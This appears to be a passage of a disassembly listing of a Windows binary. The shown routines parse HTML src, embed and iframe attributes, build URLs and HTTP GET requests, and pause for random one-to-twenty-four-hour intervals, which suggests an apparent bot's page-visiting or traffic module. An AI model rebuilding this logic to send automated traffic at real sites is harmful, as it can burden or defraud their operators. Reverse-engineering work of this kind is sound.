call sub_40D95B
push edi
lea ecx, [ebp-140h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 15h
call sub_40D95B
lea ecx, [ebp-3A4h]
jmp short loc_40E7E2
; ---------------------------------------------------------------------------
loc_40E783: ; CODE XREF: .text:0040E7FD�j
push offset byte_44D6A4
lea ecx, [ebp-140h]
call sub_40D684
test eax, eax
jz short loc_40E7FF
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-344h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push edi
lea ecx, [ebp-2C4h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 18h
call sub_40D95B
push eax
lea ecx, [ebp-140h]
mov byte ptr [ebp-4], 19h
call sub_40D60A
lea ecx, [ebp-2C4h]
call sub_40D58A
lea ecx, [ebp-344h]
loc_40E7E2: ; CODE XREF: .text:0040E781�j
mov byte ptr [ebp-4], 17h
call sub_40D58A
lea ecx, [ebp-140h]
push offset aSrc ; "src"
call sub_40D695
test eax, eax
jnz short loc_40E783
loc_40E7FF: ; CODE XREF: .text:0040E795�j
push offset byte_44D6A4
lea ecx, [ebp-140h]
call sub_40D684
test eax, eax
jz loc_40E9CE
push esi
lea eax, [ebp-2E4h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push 1
push edi
lea ecx, [ebp-0E0h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 1Ah
call sub_40D810
lea ecx, [ebp-2E4h]
call sub_40D58A
lea ecx, [ebp-1A0h]
call sub_40D512
push ebx
lea ecx, [ebp-0E0h]
mov byte ptr [ebp-4], 1Dh
call sub_40D97F
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-0E0h]
jnz short loc_40E8A0
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-1A0h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_40D6A6
add esp, 14h
jmp short loc_40E900
; ---------------------------------------------------------------------------
loc_40E8A0: ; CODE XREF: .text:0040E870�j
push offset aHttp_0 ; "http://"
call sub_40D71D
test eax, eax
jz short loc_40E8C2
lea eax, [ebp-0E0h]
lea ecx, [ebp-1A0h]
push eax
call sub_40D60A
jmp short loc_40E900
; ---------------------------------------------------------------------------
loc_40E8C2: ; CODE XREF: .text:0040E8AC�j
lea ecx, [ebp-0E0h]
call sub_40D989
push eax
lea ecx, [ebp-1B0h]
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-1A0h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_40D6A6
add esp, 18h
loc_40E900: ; CODE XREF: .text:0040E89E�j
; .text:0040E8C0�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-1A0h]
push eax
call sub_40D989
push eax
call sub_40DB4B
pop ecx
test eax, eax
pop ecx
jz loc_40E9B8
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_40E947
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_40D6A6
add esp, 0Ch
jmp short loc_40E961
; ---------------------------------------------------------------------------
loc_40E947: ; CODE XREF: .text:0040E92C�j
push dword ptr [ebp-6Ch]
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_40D6A6
add esp, 10h
loc_40E961: ; CODE XREF: .text:0040E945�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-224h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-224h]
call sub_40D58A
loc_40E9B8: ; CODE XREF: .text:0040E91C�j
lea ecx, [ebp-1A0h]
call sub_40D58A
lea ecx, [ebp-0E0h]
call sub_40D58A
loc_40E9CE: ; CODE XREF: .text:0040E811�j
lea ecx, [ebp-140h]
jmp loc_40EF24
; ---------------------------------------------------------------------------
loc_40E9D9: ; CODE XREF: .text:0040E74D�j
push offset aEmbed ; "embed"
lea ecx, [ebp-0BCh]
call sub_40D695
test eax, eax
jnz loc_40EC77
push esi
lea eax, [ebp-234h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_40D95B
push edi
lea ecx, [ebp-130h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 1Eh
call sub_40D95B
lea ecx, [ebp-234h]
jmp short loc_40EA80
; ---------------------------------------------------------------------------
loc_40EA21: ; CODE XREF: .text:0040EA9B�j
push offset byte_44D6A4
lea ecx, [ebp-130h]
call sub_40D684
test eax, eax
jz short loc_40EA9D
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-274h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push edi
lea ecx, [ebp-254h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 21h
call sub_40D95B
push eax
lea ecx, [ebp-130h]
mov byte ptr [ebp-4], 22h
call sub_40D60A
lea ecx, [ebp-254h]
call sub_40D58A
lea ecx, [ebp-274h]
loc_40EA80: ; CODE XREF: .text:0040EA1F�j
mov byte ptr [ebp-4], 20h
call sub_40D58A
lea ecx, [ebp-130h]
push offset aSrc ; "src"
call sub_40D695
test eax, eax
jnz short loc_40EA21
loc_40EA9D: ; CODE XREF: .text:0040EA33�j
push offset byte_44D6A4
lea ecx, [ebp-130h]
call sub_40D684
test eax, eax
jz loc_40EC6C
push esi
lea eax, [ebp-294h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push 1
push edi
lea ecx, [ebp-150h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 23h
call sub_40D810
lea ecx, [ebp-294h]
call sub_40D58A
lea ecx, [ebp-190h]
call sub_40D512
push ebx
lea ecx, [ebp-150h]
mov byte ptr [ebp-4], 26h
call sub_40D97F
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-150h]
jnz short loc_40EB3E
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-190h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_40D6A6
add esp, 14h
jmp short loc_40EB9E
; ---------------------------------------------------------------------------
loc_40EB3E: ; CODE XREF: .text:0040EB0E�j
push offset aHttp_0 ; "http://"
call sub_40D71D
test eax, eax
jz short loc_40EB60
lea eax, [ebp-150h]
lea ecx, [ebp-190h]
push eax
call sub_40D60A
jmp short loc_40EB9E
; ---------------------------------------------------------------------------
loc_40EB60: ; CODE XREF: .text:0040EB4A�j
lea ecx, [ebp-150h]
call sub_40D989
push eax
lea ecx, [ebp-1B0h]
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-190h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_40D6A6
add esp, 18h
loc_40EB9E: ; CODE XREF: .text:0040EB3C�j
; .text:0040EB5E�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-190h]
push eax
call sub_40D989
push eax
call sub_40DB4B
pop ecx
test eax, eax
pop ecx
jz loc_40EC56
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_40EBE5
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_40D6A6
add esp, 0Ch
jmp short loc_40EBFF
; ---------------------------------------------------------------------------
loc_40EBE5: ; CODE XREF: .text:0040EBCA�j
push dword ptr [ebp-6Ch]
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_40D6A6
add esp, 10h
loc_40EBFF: ; CODE XREF: .text:0040EBE3�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-2B4h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-2B4h]
call sub_40D58A
loc_40EC56: ; CODE XREF: .text:0040EBBA�j
lea ecx, [ebp-190h]
call sub_40D58A
lea ecx, [ebp-150h]
call sub_40D58A
loc_40EC6C: ; CODE XREF: .text:0040EAAF�j
lea ecx, [ebp-130h]
jmp loc_40EF24
; ---------------------------------------------------------------------------
loc_40EC77: ; CODE XREF: .text:0040E9EB�j
push offset aFrame ; "frame"
lea ecx, [ebp-0BCh]
call sub_40D695
test eax, eax
jz short loc_40ECA3
push offset aIframe ; "iframe"
lea ecx, [ebp-0BCh]
call sub_40D695
test eax, eax
jnz loc_40EF29
loc_40ECA3: ; CODE XREF: .text:0040EC89�j
push esi
lea eax, [ebp-2D4h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_40D95B
push edi
lea ecx, [ebp-120h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 27h
call sub_40D95B
lea ecx, [ebp-2D4h]
jmp short loc_40ED32
; ---------------------------------------------------------------------------
loc_40ECD3: ; CODE XREF: .text:0040ED4D�j
push offset byte_44D6A4
lea ecx, [ebp-120h]
call sub_40D684
test eax, eax
jz short loc_40ED4F
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-314h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push edi
lea ecx, [ebp-2F4h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 2Ah
call sub_40D95B
push eax
lea ecx, [ebp-120h]
mov byte ptr [ebp-4], 2Bh
call sub_40D60A
lea ecx, [ebp-2F4h]
call sub_40D58A
lea ecx, [ebp-314h]
loc_40ED32: ; CODE XREF: .text:0040ECD1�j
mov byte ptr [ebp-4], 29h
call sub_40D58A
lea ecx, [ebp-120h]
push offset aSrc ; "src"
call sub_40D695
test eax, eax
jnz short loc_40ECD3
loc_40ED4F: ; CODE XREF: .text:0040ECE5�j
push offset byte_44D6A4
lea ecx, [ebp-120h]
call sub_40D684
test eax, eax
jz loc_40EF1E
push esi
lea eax, [ebp-334h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push 1
push edi
lea ecx, [ebp-100h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 2Ch
call sub_40D810
lea ecx, [ebp-334h]
call sub_40D58A
lea ecx, [ebp-180h]
call sub_40D512
push ebx
lea ecx, [ebp-100h]
mov byte ptr [ebp-4], 2Fh
call sub_40D97F
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-100h]
jnz short loc_40EDF0
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-180h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_40D6A6
add esp, 14h
jmp short loc_40EE50
; ---------------------------------------------------------------------------
loc_40EDF0: ; CODE XREF: .text:0040EDC0�j
push offset aHttp_0 ; "http://"
call sub_40D71D
test eax, eax
jz short loc_40EE12
lea eax, [ebp-100h]
lea ecx, [ebp-180h]
push eax
call sub_40D60A
jmp short loc_40EE50
; ---------------------------------------------------------------------------
loc_40EE12: ; CODE XREF: .text:0040EDFC�j
lea ecx, [ebp-100h]
call sub_40D989
push eax
lea ecx, [ebp-1B0h]
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-180h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_40D6A6
add esp, 18h
loc_40EE50: ; CODE XREF: .text:0040EDEE�j
; .text:0040EE10�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-180h]
push eax
call sub_40D989
push eax
call sub_40DB4B
pop ecx
test eax, eax
pop ecx
jz loc_40EF08
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_40EE97
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_40D6A6
add esp, 0Ch
jmp short loc_40EEB1
; ---------------------------------------------------------------------------
loc_40EE97: ; CODE XREF: .text:0040EE7C�j
push dword ptr [ebp-6Ch]
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_40D6A6
add esp, 10h
loc_40EEB1: ; CODE XREF: .text:0040EE95�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-354h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-354h]
call sub_40D58A
loc_40EF08: ; CODE XREF: .text:0040EE6C�j
lea ecx, [ebp-180h]
call sub_40D58A
lea ecx, [ebp-100h]
call sub_40D58A
loc_40EF1E: ; CODE XREF: .text:0040ED61�j
lea ecx, [ebp-120h]
loc_40EF24: ; CODE XREF: .text:0040E393�j
; .text:0040E736�j ...
call sub_40D58A
loc_40EF29: ; CODE XREF: .text:0040EC9D�j
lea ecx, [ebp-0BCh]
call sub_40D58A
lea ecx, [ebp-44h]
call sub_40D58A
lea ecx, [ebp-0F0h]
call sub_40D58A
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 3
call sub_40F05F
loc_40EF56: ; CODE XREF: .text:0040E153�j
cmp [ebp-3B4h], ebx
jnz loc_40E158
jmp short loc_40EF73
; ---------------------------------------------------------------------------
loc_40EF64: ; CODE XREF: .text:0040E176�j
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 3
call sub_40F05F
loc_40EF73: ; CODE XREF: .text:0040EF62�j
mov eax, [ebp-3B8h]
cmp eax, ebx
jnz short loc_40EF8E
push 5265C00h
push 36EE80h
call sub_41409E
pop ecx
pop ecx
loc_40EF8E: ; CODE XREF: .text:0040EF7B�j
push eax
call dword_42F15C ; Sleep
inc dword ptr [ebp-48h]
lea ecx, [ebp-0CCh]
call sub_40D58A
lea ecx, [ebp-20h]
call sub_40D58A
lea ecx, [ebp-30h]
mov [ebp-4], bl
call sub_40D58A
mov eax, [ebp-48h]
cmp eax, [ebp-3C0h]
jl loc_40E08F
loc_40EFC5: ; CODE XREF: .text:0040E07F�j
cmp [ebp-3ACh], ebx
mov esi, offset aDoneSU ; "Done --> %s:%u"
jnz short loc_40EFFA
cmp [ebp-3B0h], ebx
jnz short loc_40F002
push dword ptr [ebp-3C4h]
lea eax, [ebp-0C48h]
push eax
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_4104F6
add esp, 14h
loc_40EFFA: ; CODE XREF: .text:0040EFD0�j
cmp [ebp-3B0h], ebx
jz short loc_40F022
loc_40F002: ; CODE XREF: .text:0040EFD8�j
push dword ptr [ebp-3C4h]
lea eax, [ebp-0C48h]
push eax
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_410491
add esp, 14h
loc_40F022: ; CODE XREF: .text:0040F000�j
push dword ptr [ebp-3C8h]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
; =============== S U B R O U T I N E =======================================
sub_40F035 proc near ; CODE XREF: .text:0040DFCB�p
; .text:0040E15E�p
mov edx, ecx
call sub_40D512
lea ecx, [edx+10h]
call sub_40D512
lea ecx, [edx+20h]
call sub_40D512
lea ecx, [edx+30h]
call sub_40D512
lea ecx, [edx+44h]
call sub_40D512
mov eax, edx
retn
sub_40F035 endp
; =============== S U B R O U T I N E =======================================
sub_40F05F proc near ; CODE XREF: .text:0040E046�p
; .text:0040EF51�p ...
push esi
mov esi, ecx
lea ecx, [esi+44h]
call sub_40D58A
lea ecx, [esi+30h]
call sub_40D58A
lea ecx, [esi+20h]
call sub_40D58A
lea ecx, [esi+10h]
call sub_40D58A
mov ecx, esi
pop esi
jmp sub_40D58A
sub_40F05F endp
; =============== S U B R O U T I N E =======================================
sub_40F08A proc near ; CODE XREF: sub_40D810+132�p
; .text:0042EC0F�j
push esi
mov esi, ecx
push dword ptr [esi+4]
call sub_421C78
xor eax, eax
pop ecx
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
pop esi
retn
sub_40F08A endp
; =============== S U B R O U T I N E =======================================
sub_40F0A3 proc near ; CODE XREF: sub_40D810+112�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_40F0BE
mov eax, [esi+8]
sub eax, ecx
sar eax, 2
cmp eax, edi
ja short loc_40F0C5
loc_40F0BE: ; CODE XREF: sub_40F0A3+D�j
mov ecx, esi
call sub_40F0E1
loc_40F0C5: ; CODE XREF: sub_40F0A3+19�j
mov eax, [esi+4]
lea eax, [eax+edi*4]
pop edi
pop esi
retn 4
sub_40F0A3 endp
; =============== S U B R O U T I N E =======================================
sub_40F0D0 proc near ; CODE XREF: sub_40D810+76�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push dword ptr [ecx+8]
call sub_40F467
retn 4
sub_40F0D0 endp
; =============== S U B R O U T I N E =======================================
sub_40F0E1 proc near ; CODE XREF: sub_40F0A3+1D�p
mov eax, offset loc_42EEC0
call sub_423A68
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_40F143
mov esi, offset aInvalidVectorT ; "invalid vector<T> subscript"
push esi
call sub_422120
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_40F17B
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_40F1B0
lea eax, [ebp-3Ch]
push offset dword_4300C0
push eax
mov dword ptr [ebp-3Ch], offset off_42F378
call sub_423A87
pop esi
loc_40F13B: ; CODE XREF: .text:0042EEBB�j
; .text:0042EF57�j ...
push 1
call sub_40F143
retn
sub_40F0E1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F143 proc near ; CODE XREF: sub_40F0E1+19�p
; sub_40F0E1+5C�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_40F16B
mov eax, [esi+4]
test eax, eax
jz short loc_40F16B
dec eax
mov cl, [eax]
test cl, cl
jz short loc_40F164
cmp cl, 0FFh
jz short loc_40F164
dec byte ptr [eax]
jmp short loc_40F16B
; ---------------------------------------------------------------------------
loc_40F164: ; CODE XREF: sub_40F143+16�j
; sub_40F143+1B�j
push eax
call sub_421C78
pop ecx
loc_40F16B: ; CODE XREF: sub_40F143+8�j
; sub_40F143+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_40F143 endp
; =============== S U B R O U T I N E =======================================
sub_40F17B proc near ; CODE XREF: sub_40F0E1+2F�p
; sub_40F740+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
push edi
mov esi, ecx
call sub_40F3E1
test al, al
jz short loc_40F1A9
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_4223F0
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40F1A9: ; CODE XREF: sub_40F17B+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_40F17B endp
; =============== S U B R O U T I N E =======================================
sub_40F1B0 proc near ; CODE XREF: sub_40F0E1+3F�p
; sub_421C83+3F�p ...
mov eax, offset loc_42EED4
call sub_423A68
push ecx
push ecx
push ebx
push esi
lea eax, [ebp-10h]
push edi
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset byte_44D6A4
call sub_423B24
mov ebx, [ebp+8]
and dword ptr [ebp-4], 0
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_40F143
push 0FFFFFFFFh
push 0
push ebx
mov ecx, edi
call sub_40F210
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_42F368
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_40F1B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F210 proc near ; CODE XREF: sub_40F1B0+42�p
; sub_40F389+3A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_40F228
call sub_421D6B
loc_40F228: ; CODE XREF: sub_40F210+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_40F23A
mov esi, [ebp+arg_8]
loc_40F23A: ; CODE XREF: sub_40F210+25�j
cmp edi, ebx
jnz short loc_40F258
add esi, ecx
push 0FFFFFFFFh
push esi
mov ecx, edi
call sub_40F2DD
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_40F2DD
jmp short loc_40F2D4
; ---------------------------------------------------------------------------
loc_40F258: ; CODE XREF: sub_40F210+2C�j
test esi, esi
jbe short loc_40F29B
cmp esi, eax
jnz short loc_40F29B
mov eax, [ebx+4]
test eax, eax
jnz short loc_40F26C
mov eax, offset dword_42F314
loc_40F26C: ; CODE XREF: sub_40F210+55�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_40F29B
push 1
mov ecx, edi
call sub_40F143
mov eax, [ebx+4]
test eax, eax
jnz short loc_40F287
mov eax, offset dword_42F314
loc_40F287: ; CODE XREF: sub_40F210+70�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_40F2D4
; ---------------------------------------------------------------------------
loc_40F29B: ; CODE XREF: sub_40F210+4A�j
; sub_40F210+4E�j ...
push 1
push esi
mov ecx, edi
call sub_40F3E1
test al, al
jz short loc_40F2D4
mov eax, [ebp+arg_0]
mov eax, [eax+4]
test eax, eax
jnz short loc_40F2B8
mov eax, offset dword_42F314
loc_40F2B8: ; CODE XREF: sub_40F210+A1�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_4223F0
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_40F2D4: ; CODE XREF: sub_40F210+46�j
; sub_40F210+89�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40F210 endp
; =============== S U B R O U T I N E =======================================
sub_40F2DD proc near ; CODE XREF: sub_40F210+35�p
; sub_40F210+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_40F2F0
call sub_421D6B
loc_40F2F0: ; CODE XREF: sub_40F2DD+C�j
mov ecx, edi
call sub_40F740
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_40F306
mov ebx, eax
loc_40F306: ; CODE XREF: sub_40F2DD+25�j
test ebx, ebx
jbe short loc_40F33C
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_423C20
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_40F3E1
test al, al
jz short loc_40F33C
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_40F33C: ; CODE XREF: sub_40F2DD+2B�j
; sub_40F2DD+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_40F2DD endp
; =============== S U B R O U T I N E =======================================
sub_40F344 proc near ; DATA XREF: .text:0042F34C�o
; .text:0042F36C�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_40F350
mov eax, offset dword_42F314
locret_40F350: ; CODE XREF: sub_40F344+5�j
retn
sub_40F344 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F351 proc near ; DATA XREF: .text:0042F370�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_40F389
lea eax, [ebp+var_1C]
push offset dword_430124
push eax
call sub_423A87
sub_40F351 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F36E proc near ; CODE XREF: sub_40F632+20�p
; DATA XREF: .text:004300C4�o ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_42F368
call sub_40F143
mov ecx, esi
pop esi
jmp sub_423BAB
sub_40F36E endp
; =============== S U B R O U T I N E =======================================
sub_40F389 proc near ; CODE XREF: sub_40F351+A�p
; sub_40F728+7�p ...
mov eax, offset loc_42EEE8
call sub_423A68
push ecx
push ebx
mov ebx, [ebp+8]
push esi
push edi
mov esi, ecx
push ebx
mov [ebp-10h], esi
call sub_423B61
and dword ptr [ebp-4], 0
add ebx, 0Ch
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_40F143
push 0FFFFFFFFh
push 0
push ebx
mov ecx, edi
call sub_40F210
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_42F368
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_40F389 endp
; =============== S U B R O U T I N E =======================================
sub_40F3E1 proc near ; CODE XREF: sub_40F17B+B�p
; sub_40F210+90�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_40F3F3
call sub_421C83
loc_40F3F3: ; CODE XREF: sub_40F3E1+B�j
mov eax, [esi+4]
xor edx, edx
cmp eax, edx
jz short loc_40F41B
mov cl, [eax-1]
cmp cl, dl
jz short loc_40F41B
cmp cl, 0FFh
jz short loc_40F41B
cmp edi, edx
mov ecx, esi
jnz short loc_40F45A
dec byte ptr [eax-1]
push edx
loc_40F412: ; CODE XREF: sub_40F3E1+48�j
call sub_40F143
loc_40F417: ; CODE XREF: sub_40F3E1+4C�j
; sub_40F3E1+53�j
xor al, al
jmp short loc_40F462
; ---------------------------------------------------------------------------
loc_40F41B: ; CODE XREF: sub_40F3E1+19�j
; sub_40F3E1+20�j ...
cmp edi, edx
jnz short loc_40F436
cmp [esp+8+arg_4], dl
jz short loc_40F42B
push 1
mov ecx, esi
jmp short loc_40F412
; ---------------------------------------------------------------------------
loc_40F42B: ; CODE XREF: sub_40F3E1+42�j
cmp eax, edx
jz short loc_40F417
mov [esi+8], edx
mov [eax], dl
jmp short loc_40F417
; ---------------------------------------------------------------------------
loc_40F436: ; CODE XREF: sub_40F3E1+3C�j
cmp [esp+8+arg_4], dl
jz short loc_40F453
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_40F448
cmp eax, edi
jnb short loc_40F460
loc_40F448: ; CODE XREF: sub_40F3E1+61�j
push 1
mov ecx, esi
call sub_40F143
jmp short loc_40F458
; ---------------------------------------------------------------------------
loc_40F453: ; CODE XREF: sub_40F3E1+59�j
cmp [esi+0Ch], edi
jnb short loc_40F460
loc_40F458: ; CODE XREF: sub_40F3E1+70�j
mov ecx, esi
loc_40F45A: ; CODE XREF: sub_40F3E1+2B�j
push edi
call sub_40F66B
loc_40F460: ; CODE XREF: sub_40F3E1+65�j
; sub_40F3E1+75�j
mov al, 1
loc_40F462: ; CODE XREF: sub_40F3E1+38�j
pop edi
pop esi
retn 8
sub_40F3E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F467 proc near ; CODE XREF: sub_40F0D0+9�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ecx
push edi
mov edi, [ebp+arg_4]
mov ecx, [esi+8]
mov eax, [esi+0Ch]
sub eax, ecx
sar eax, 2
cmp eax, edi
jnb loc_40F559
mov edx, [esi+4]
test edx, edx
jz short loc_40F498
mov eax, ecx
sub eax, edx
sar eax, 2
cmp edi, eax
jb short loc_40F49A
loc_40F498: ; CODE XREF: sub_40F467+24�j
mov eax, edi
loc_40F49A: ; CODE XREF: sub_40F467+2F�j
test edx, edx
jnz short loc_40F4A2
xor ecx, ecx
jmp short loc_40F4A7
; ---------------------------------------------------------------------------
